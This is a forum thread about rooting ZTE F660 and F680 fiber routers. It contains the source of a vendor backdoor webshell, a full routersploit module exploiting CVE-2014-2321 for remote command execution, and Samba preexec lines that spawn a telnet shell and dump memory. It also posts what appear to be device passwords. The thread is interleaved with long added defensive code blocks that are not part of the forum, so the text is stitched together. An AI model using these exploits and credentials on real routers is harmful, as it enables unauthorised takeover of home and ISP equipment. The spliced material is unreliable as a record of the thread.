ZTE ZXHN F660 - Power to the masses

Newtman
Posts: 3
Registered on: 02 May 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Post by Newtman »

Hello,
We have another problem: I have got an F660v5 running firmware "t38" and the passwords are encrypted! When you print information with sendcmd (by TTL) the passwords are shown as asterisks.
I rolled back to the first FW and I got the passwords without problem, but it is different in the latest firmware.
I guess the new F670 has got the encryption too.

Do you know something about this?
error_404
Global moderator
Posts: 356
Registered on: 22 Dec 2012 10:58

Re: ZTE ZXHN F660 - Power to the masses

Post by error_404 »

Hi,
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!

Code: Select all

sed -i 's|TS_Enable" val="0"|TS_Enable" val="1"|g' /userconfig/cfg/db_default_cfg.xml
of course with root, which you mention you've gained
:evil:
"For me the worst thing in Bulgaria is the wonderful delight that people here take in persecuting one another and in spoiling each other's work."
K. Jireček, 13.12.1881
Newtman
Posts: 3
Registered on: 02 May 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Post by Newtman »

error_404 wrote: 22 Aug 2018 20:09 Hi,
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!

Code: Select all

sed -i 's|TS_Enable" val="0"|TS_Enable" val="1"|g' /userconfig/cfg/db_default_cfg.xml
of course with root, which you mention you've gained
:evil:
Yes, I know. I changed the password, but I want an easy way to access as admin without opening the ONT... In consequence, to know the original password.
Do you know where the hash is stored?

Thanks!
Newtman
Posts: 3
Registered on: 02 May 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Post by Newtman »

Today I found a new firmware on F660 v5.2... V5.2.10P3T52 :thumbdown:
I can't enter by TTL because now root/root doesn't work anymore. Telnet is closed on the LAN too...

I think we haven't got more options now, what do you think?

My idea now is to dump the NAND; it is an F59L1G81MA. I have got a pair of "universal" programmers, I need the socket now.
error_404
Global moderator
Posts: 356
Registered on: 22 Dec 2012 10:58

For historic archive: WebShell Command Exploit

Post by error_404 »

Just putting some exploit which was not working anymore, but for historic reasons and knowledge!

https://blog.rapid7.com/2014/03/03/disc ... -backdoor/
http://cve.mitre.org/cgi-bin/cvename.cg ... -2014-2321
https://www.kb.cert.org/vuls/id/600724/

web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F660 Webshell
</title>
<LINK REL="stylesheet" HREF="css/login.css" TYPE="text/css" />
<LINK REL="stylesheet" HREF="css/template.css" TYPE="text/css" />
<style>
* {
margin: 0 0 0 0;
padding: 0;
}
.textarea_1 {
height:420px;
width:794px;
border:1px solid #7F9DB7;
font-size: 12px;
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
text-align:left;
}
#e8_container {
margin: 0 auto;
width: 800px;
text-align: left;
position: relative;
min-height: 600px;
height: 600px;
}
#banner {
width:800px;
height:70px;
}
.bottom_td3 {
width:800px;
background-color:#eeeeee;
margin-right:2px;
text-align:right;
}
.copyright {
float:left;
display:block;
height:16px;
width:800px;
padding-top:10px;
border-left:1px solid #B1B1B1;
border-right:1px solid #B1B1B1;
text-align:center;
}
.bottom_line {
float:left;
display:block;
background-color:#5aa929;
height:8px;
width:800px;
}
.type{
position:absolute;
top:32px;left:540px;
font:20px Arial,sans-serif;
color:#fff;z-index:999;
}
.inputId {
width:720px;
}
table.table td.td11 {
width:30%;
height:24px;
text-align:right;
}
</style>
<script language="javascript">

function getObj(id) {
return (document.getElementById(id));
}

function jslSetValue(src, dst) {
var ss = document.getElementById(dst).value;
document.getElementById(src).value = ss;
}

function setValue(id, value) {
document.getElementById(id).value = value;
}

function Transfer_meaning(id, value) {
document.getElementById(id).value = value;
}
function getValue(id) {
return (document.getElementById(id).value);
}

function jslDisable(id) {
var i;
var num = jslDisable.arguments.length;
if (num == 0) return;
for (i = 0; i < num; i++) {
document.getElementById(arguments[i]).disabled = true;
}
}
var CMD_PARA = new Array(
"Cmd",
"CmdAck"
);
function pageLoad(url) {
getObj("running").style.display = "none";
}
function pageSetValue() {
jslSetValue("Cmd", "Frm_Cmd");
}
function pageSubmit() {
jslDisable("Btn_Submit");
pageSetValue();
setValue("IF_ACTION", "apply");
getObj("running").style.display = "";
getObj("running_title").innerHTML = "it is running, please wait...";
getObj("fSubmit").submit();
}
</script>
<%
IMPORT FILE "common_gch.gch";
var FP_ERRORSTR = "SUCC";
var FP_PARANUM = 2;
var PARA[2] =
{
"Cmd",
"CmdAck"
};

create_form_start("fSubmit", "'/web_shell_cmd.gch'");
createBasicHidden();
create_hidden_newpara(PARA, FP_PARANUM);
var CmdAck="";
var Cmd = request("Cmd");
var FP_ACTION = request("IF_ACTION");
if(FP_ACTION == "apply")
{
CmdAck = show_shellcmd(Cmd);
}
getDisplayInstError(FP_ERRORSTR);
undoDBSave();

create_form_end();
%>
</head>

<body>
<div id="e8_container" style="background-color:#eeeeee;">
<div id="head">
<div id="banner" style="background-image:url(img/banner.gif); background-repeat:no-repeat"></div>
</div>
<table class="table" width="500px" border="0" align="center">
<tr>
</tr>
<tr id="running" class="white" style="display: none;">
<td>
<font id="running_title" style="display: ;"></font>&nbsp;&nbsp;<img src="img/uploading.gif">
</td>
</tr>
<tr>
<td class="td3" colspan="2">
</td>
</tr>
<tr>
<td class="td11" id="Fnt_Cmd">Command: </td>
<td class="td2">
<input name="textfield22" type="text" id="Frm_Cmd" class="inputId" value="" size="150" />
</td>
</tr>
<tr>
<td colspan="2" align="right">
<input name='Submit' type='button' id='Btn_Submit' onclick=pageSubmit() class='button' value=' Submit ' /></td>
</tr>
<br>
<tr>
<td class="td3" colspan="2">
<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1"><%=CmdAck;%></textarea>
</td>
</tr>
</table>
<br>
</div>
</body>

</html>


Routersploit Module
f460_f660_backdoor.py

import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "ZTE F460 & F660 Backdoor RCE",
        "description": "Exploits ZTE F460 and F660 backdoor vulnerability that allows "
                       "executing commands on operating system level.",
        "authors": (
            "Rapid7",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://community.rapid7.com/community/ ... h-backdoor",
        ),
        "devices": (
            "ZTE F460",
            "ZTE F660",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop")
            shell(self)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        data = {
            "IF_ACTION": "apply",
            "IF_ERRORSTR": "SUCC",
            "IF_ERRORPARAM": "SUCC",
            "IF_ERRORTYPE": "-1",
            "Cmd": cmd,
            "CmdAck": ""
        }

        response = self.http_request(
            method="POST",
            path="/web_shell_cmd.gch",
            data=data
        )
        if response is None:
            return ""

        if response.status_code == 200:
            regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
            res = re.findall(regexp, response.text, re.DOTALL)

            if len(res):
                return res[0]

        return ""

    @mute
    def check(self):
        marker = utils.random_text(32)
        cmd = "echo {}".format(marker)

        response = self.execute(cmd)
        if marker in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable

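For the defender's side of the same CVE-2014-2321 backdoor, here is an added example (not from the post and not part of routersploit) that scans web-server access logs for requests to /web_shell_cmd.gch and grades each hit by method and status, since the CGI only executes a command on a POST with IF_ACTION=apply. The NCSA-style log format, the regex that parses it and the sample lines are constructed assumptions; adapt LOG_RE to whatever your collector actually writes.

```python
"""Flag web-server log lines that touch the ZTE web_shell_cmd.gch backdoor CGI (CVE-2014-2321).

Added example, not from the forum post or from routersploit. The log format (NCSA/Apache
combined style) and the sample lines below are constructed assumptions.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed assumption: NCSA-style access log, one request per line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# The backdoor lives at a fixed path; match case-insensitively because some
# embedded web servers resolve paths without regard to case.
BACKDOOR_PATH = re.compile(r'/web_shell_cmd\.gch(?:$|[?#/])', re.IGNORECASE)


@dataclass
class Finding:
    src: str
    ts: str
    method: str
    path: str
    status: int
    severity: str
    reason: str


def classify(line: str) -> Optional[Finding]:
    """Return a Finding if the line requests the backdoor CGI, else None."""
    m = LOG_RE.match(line)
    if not m or not BACKDOOR_PATH.search(m["path"]):
        return None
    status = int(m["status"])
    method = m["method"]
    if method == "POST" and status == 200:
        # The CGI only runs a command on a POST with IF_ACTION=apply; a 200 on a
        # POST means the form was accepted, so treat it as probable execution.
        severity, reason = "high", "POST accepted by backdoor CGI (probable command execution)"
    elif status == 200:
        severity, reason = "medium", "backdoor CGI served (reconnaissance or form load)"
    else:
        severity, reason = "low", f"backdoor path requested, server answered {status}"
    return Finding(m["src"], m["ts"], method, m["path"], status, severity, reason)


def scan(lines: Iterable[str]) -> List[Finding]:
    """Run classify() over a log stream and keep only the hits."""
    return [f for f in map(classify, lines) if f is not None]


def sources_with_execution(findings: Iterable[Finding]) -> List[str]:
    """Distinct client addresses with at least one high-severity hit, for blocking or triage."""
    seen: List[str] = []
    for f in findings:
        if f.severity == "high" and f.src not in seen:
            seen.append(f.src)
    return seen


# Constructed sample log; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Mar/2014:10:12:01 +0000] "GET /web_shell_cmd.gch HTTP/1.1" 200 4212',
    '203.0.113.7 - - [03/Mar/2014:10:12:05 +0000] "POST /web_shell_cmd.gch HTTP/1.1" 200 4398',
    '192.168.1.20 - - [03/Mar/2014:10:13:44 +0000] "GET /start.ghtml HTTP/1.1" 200 1520',
    '198.51.100.9 - - [03/Mar/2014:11:00:00 +0000] "POST /WEB_SHELL_CMD.GCH HTTP/1.1" 404 321',
    'not a log line at all',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"[{hit.severity}] {hit.src} {hit.method} {hit.path} -> {hit.status}: {hit.reason}")
```

A 404 for the path is still worth keeping at low severity: after a firmware update closes the CGI, those lines show who is still probing for it.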
error_404
Global moderator
Posts: 356
Registered on: 22 Dec 2012 10:58

ZTE ZXHN F660v5 FW T38 and T52 - 2019

Post by error_404 »

Many thanks @Alejandro in SPAMLoco Forum
AUG.2019

5u4r3Z=%

:clap:
jimpapi
Posts: 1
Registered on: 21 Jun 2020 18:56

Re: ZTE ZXHN F660 - Power to the masses

Post by jimpapi »

Hello to everybody... it's a nice article and helps a lot. I am trying to create my firmware by dumping from my mtdblocks.
My ZTE is ZXHN H267A h.v 1.1

# cat /proc/mtd
dev: size erasesize name
mtd0: 075e0000 00020000 "Whole flash"
mtd1: 00040000 00020000 "Bootloader"
mtd2: 00040000 00020000 "tag"
mtd3: 00200000 00020000 "config"
mtd4: 01400000 00020000 "rootfs1"
mtd5: 00400000 00020000 "kernel1"
mtd6: 00400000 00020000 "kernel2"
mtd7: 01400000 00020000 "rootfs2"
mtd8: 00900000 00900000 "ram_flash"

I saved my mtdblock0 (whole flash) to my computer with the help of a tftp server.
I tried to binwalk the mtdblock0 and I really found the start of the magic header 99 99 99 99 44 44 44 44.
I compared the chunks in memory and I found the part that contains the kernel and rootfs... I created my upgrade.bin with these two (in mtdblock0 they are concatenated already).
I don't have the original firmware but I compared with another firmware for the H267A from another country (different ISP provider).
The size of my created firmware is a little smaller than the original I found...
Please help... did I miss something?
I binwalked the original firmware but unsquashfs_all doesn't support the file system... so I can't decompress... I do all the work in a hex viewer and via SSH on my router...
Thanks in advance!
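To make the mtdblock carving described in the post reproducible, here is an added example (not jimpapi's code) that parses the /proc/mtd listing from the post, computes each partition's offset inside a whole-flash dump, carves the partitions, and finds every occurrence of the 99 99 99 99 44 44 44 44 header. It assumes partitions mtd1 onwards are laid out back to back from offset 0 in /proc/mtd order, that mtd0 is the whole chip and that ram_flash is RAM-backed; those assumptions must be checked against the bootloader's partition table before any carved image is trusted. The flash image it runs on is constructed (zeros, with the header planted at the start of each kernel partition).

```python
"""Parse /proc/mtd, derive partition offsets in a whole-flash dump, carve partitions
and locate the 99 99 99 99 44 44 44 44 image header.

Added example, not code from the post. PROC_MTD is the listing from the post; the flash
image is constructed. Assumption: mtd1..mtdN sit back to back from offset 0 in /proc/mtd
order, mtd0 spans the whole chip and ram_flash is not on flash at all.
"""
import re
from typing import Dict, List, NamedTuple

PROC_MTD = """\
dev: size erasesize name
mtd0: 075e0000 00020000 "Whole flash"
mtd1: 00040000 00020000 "Bootloader"
mtd2: 00040000 00020000 "tag"
mtd3: 00200000 00020000 "config"
mtd4: 01400000 00020000 "rootfs1"
mtd5: 00400000 00020000 "kernel1"
mtd6: 00400000 00020000 "kernel2"
mtd7: 01400000 00020000 "rootfs2"
mtd8: 00900000 00900000 "ram_flash"
"""

MAGIC = bytes.fromhex("9999999944444444")  # header the post reports from binwalk
NOT_ON_FLASH = {"Whole flash", "ram_flash"}  # assumption: no own range inside the dump
MTD_LINE = re.compile(r'^mtd(\d+):\s+([0-9a-fA-F]+)\s+([0-9a-fA-F]+)\s+"([^"]*)"\s*$')


class Partition(NamedTuple):
    index: int
    name: str
    size: int
    erasesize: int
    offset: int  # byte offset inside the whole-flash dump, -1 if not on flash


def parse_proc_mtd(text: str) -> List[Partition]:
    """Turn the /proc/mtd listing into partitions with cumulative offsets."""
    parts: List[Partition] = []
    offset = 0
    for line in text.splitlines():
        m = MTD_LINE.match(line.strip())
        if not m:
            continue  # header line or unrelated text
        idx, size, erase, name = int(m[1]), int(m[2], 16), int(m[3], 16), m[4]
        if name in NOT_ON_FLASH:
            parts.append(Partition(idx, name, size, erase, -1))
            continue
        parts.append(Partition(idx, name, size, erase, offset))
        offset += size
    return parts


def check_layout(parts: List[Partition]) -> List[str]:
    """Sanity checks to run before carving: erase-block alignment and chip bounds."""
    issues: List[str] = []
    whole = next((p.size for p in parts if p.name == "Whole flash"), None)
    for p in parts:
        if p.offset < 0:
            continue
        if p.erasesize and p.size % p.erasesize:
            issues.append(f"{p.name}: size is not a multiple of the erase block")
        if p.erasesize and p.offset % p.erasesize:
            issues.append(f"{p.name}: offset is not erase-block aligned")
        if whole is not None and p.offset + p.size > whole:
            issues.append(f"{p.name}: extends past the whole-flash size")
    return issues


def carve(dump: bytes, parts: List[Partition]) -> Dict[str, memoryview]:
    """Zero-copy view of each on-flash partition, keyed by name."""
    view = memoryview(dump)
    out: Dict[str, memoryview] = {}
    for p in parts:
        if p.offset < 0:
            continue
        if p.offset + p.size > len(view):
            raise ValueError(f"dump is too short for {p.name}")
        out[p.name] = view[p.offset:p.offset + p.size]
    return out


def find_magic(dump: bytes, magic: bytes = MAGIC) -> List[int]:
    """Every offset at which the image header occurs."""
    hits: List[int] = []
    pos = 0
    while True:
        pos = dump.find(magic, pos)
        if pos < 0:
            return hits
        hits.append(pos)
        pos += 1


def partition_at(parts: List[Partition], offset: int) -> str:
    """Name of the partition containing a dump offset, or 'unassigned'."""
    for p in parts:
        if p.offset >= 0 and p.offset <= offset < p.offset + p.size:
            return p.name
    return "unassigned"


def make_sample_dump(parts: List[Partition]) -> bytearray:
    """Constructed stand-in for mtdblock0: zeros, with MAGIC at the start of each kernel."""
    dump = bytearray(sum(p.size for p in parts if p.offset >= 0))
    for p in parts:
        if p.offset >= 0 and p.name.startswith("kernel"):
            dump[p.offset:p.offset + len(MAGIC)] = MAGIC
    return dump


if __name__ == "__main__":
    parts = parse_proc_mtd(PROC_MTD)
    for p in parts:
        print(f"mtd{p.index:<2} {p.name:<12} size=0x{p.size:08x} offset={p.offset:#x}")
    print("layout issues:", check_layout(parts) or "none")
    dump = make_sample_dump(parts)
    for off in find_magic(dump):
        print(f"header at {off:#x} ({partition_at(parts, off)})")
```

On a real dump, replace make_sample_dump() with the bytes read from the saved mtdblock0; a header that lands somewhere other than the start of a kernel partition, or a check_layout() complaint, is the first place to look when a rebuilt image comes out a different size from the vendor's.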
error_404
Global moderator
Posts: 356
Registered on: 22 Dec 2012 10:58

ZTE ZXHN F680 - Update for the masses

Post by error_404 »

Hello boys and girls,
a long long time ago I had too much time to play with F660, but...... now ANTEL is taking the step to change the old F660 with the brand new F680 (better WiFi + extender option and can handle up to 800 Mbits), so the new challenge is about to begin....

I'll try the samba exploiting method first as well and of course using UART for debugging and to find some new treasures....

As you know F660 is already covered to the max w/o the firmwares, for which it would be nice to have some repository of different firmwares as it is a very common product for PON providers worldwide.....

HINT and TIP:
Use USB with a symbolic link to exploit SAMBA and enable it on the F680 with instalador/wwzz2233

Code: Select all

ln -s /var/samba/lib/smb.conf
Look on the internet for how to modify the smb.conf on the fly and how to make a reverse telnet....

Code: Select all

preexec = /mnt/usb1_1/busybox telnetd -b 192.168.1.1:2323 -l /mnt/usb2_1_1/sh
[will make telnet listen on port 2323]
Also obtain BusyBox for the current hardware architecture (arm71 or MIPS) and copy it as 2 files with the same content 1:1 - busybox and sh .... (yes, we'll use BusyBox as SHELL ;)
On the USB drive, apart from the symbolic link, you must have both files, which are the same.
(this is publicly available information and is everywhere, trust me; credits go to the authors)

Something like this:

Code: Select all

preexec = /bin/sh -c '(sendcmd 1 DB set TelnetCfg 0 UserTypeFlag 0 && sendcmd 1 DB save) 2> /mnt/usb1_1/cmd.err > /mnt/usb1_1/cmd.out'
Make a dump of the memory:

Code: Select all

preexec = /bin/cat /dev/mem > /mnt/usb1_1/ramf680.txt
This is very raw raw material and mostly notes as I'm waiting for the hardware to attach the UART and DEBUG the dEVIL ;)
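Because the preexec trick in the post works against any Samba server whose configuration a user can edit, the check a defender wants is an audit of smb.conf for exec hooks, wide symlink following and writable guest shares. The following is an added example, not code from the post; the sample configuration is constructed around the one preexec line the post shows, and the parameter names it looks for (preexec, exec, postexec, root preexec, root postexec, magic script, wide links, guest ok, read only / writable / writeable) are real Samba parameters.

```python
"""Audit an smb.conf for settings that turn a file share into a code-execution or
file-system-escape path: exec hooks, wide symlink following, writable guest shares.

Added example, not from the post. The sample configuration is constructed; only the
preexec line is the one the post shows. Parameter names are real Samba parameters.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Samba parameters that run a server-side command when a share is connected or disconnected.
EXEC_KEYS = {"preexec", "exec", "postexec", "root preexec", "root postexec", "magic script"}
TRUE_VALUES = {"yes", "true", "1"}

SECTION_RE = re.compile(r"^\[(?P<name>[^\]]+)\]\s*$")
KV_RE = re.compile(r"^(?P<key>[^=]+?)\s*=\s*(?P<value>.*?)\s*$")


def normalise_key(key: str) -> str:
    """Samba ignores case and internal whitespace in parameter names."""
    return " ".join(key.lower().split())


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser: sections in file order, keys normalised, comments dropped."""
    config: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        sec = SECTION_RE.match(line)
        if sec:
            current = normalise_key(sec["name"])
            config.setdefault(current, {})
            continue
        kv = KV_RE.match(line)
        if kv and current is not None:
            config[current][normalise_key(kv["key"])] = kv["value"]
    return config


@dataclass
class Finding:
    section: str
    key: str
    value: str
    severity: str
    reason: str


def is_true(value: str) -> bool:
    return value.strip().lower() in TRUE_VALUES


def share_is_writable(share: Dict[str, str], global_: Dict[str, str]) -> bool:
    """Honour the three spellings Samba accepts; the share setting overrides [global]."""
    for opts in (share, global_):
        if "read only" in opts:
            return not is_true(opts["read only"])
        if "writable" in opts:
            return is_true(opts["writable"])
        if "writeable" in opts:
            return is_true(opts["writeable"])
    return False  # Samba default is read only = yes


def audit(config: Dict[str, Dict[str, str]]) -> List[Finding]:
    """Findings in file order: global symlink policy first, then per-share hooks and guest writes."""
    findings: List[Finding] = []
    global_ = config.get("global", {})
    if is_true(global_.get("wide links", "no")):
        findings.append(Finding("global", "wide links", global_["wide links"], "medium",
                                "symlinks inside a share may point outside the share tree"))
    for section, opts in config.items():
        for key in sorted(EXEC_KEYS.intersection(opts)):
            findings.append(Finding(section, key, opts[key], "high",
                                    "command runs on the server when a client connects"))
        if section == "global":
            continue
        if is_true(opts.get("guest ok", "no")) and share_is_writable(opts, global_):
            findings.append(Finding(section, "guest ok", opts["guest ok"], "medium",
                                    "unauthenticated clients can write to the share"))
    return findings


# Constructed sample; the preexec line is the one from the post.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   Wide Links = yes
; removable media
[usb1_1]
   path = /mnt/usb1_1
   guest ok = yes
   read only = no
   preexec = /bin/cat /dev/mem > /mnt/usb1_1/ramf680.txt
[printers]
   path = /var/spool/samba
   read only = yes
"""

if __name__ == "__main__":
    for f in audit(parse_smb_conf(SAMPLE_SMB_CONF)):
        print(f"[{f.severity}] [{f.section}] {f.key} = {f.value}: {f.reason}")
```

On a device like the one in the post, the file to feed in is the one the share's symlink points at; any exec hook found there that the vendor did not ship is a sign the configuration has been rewritten through the share.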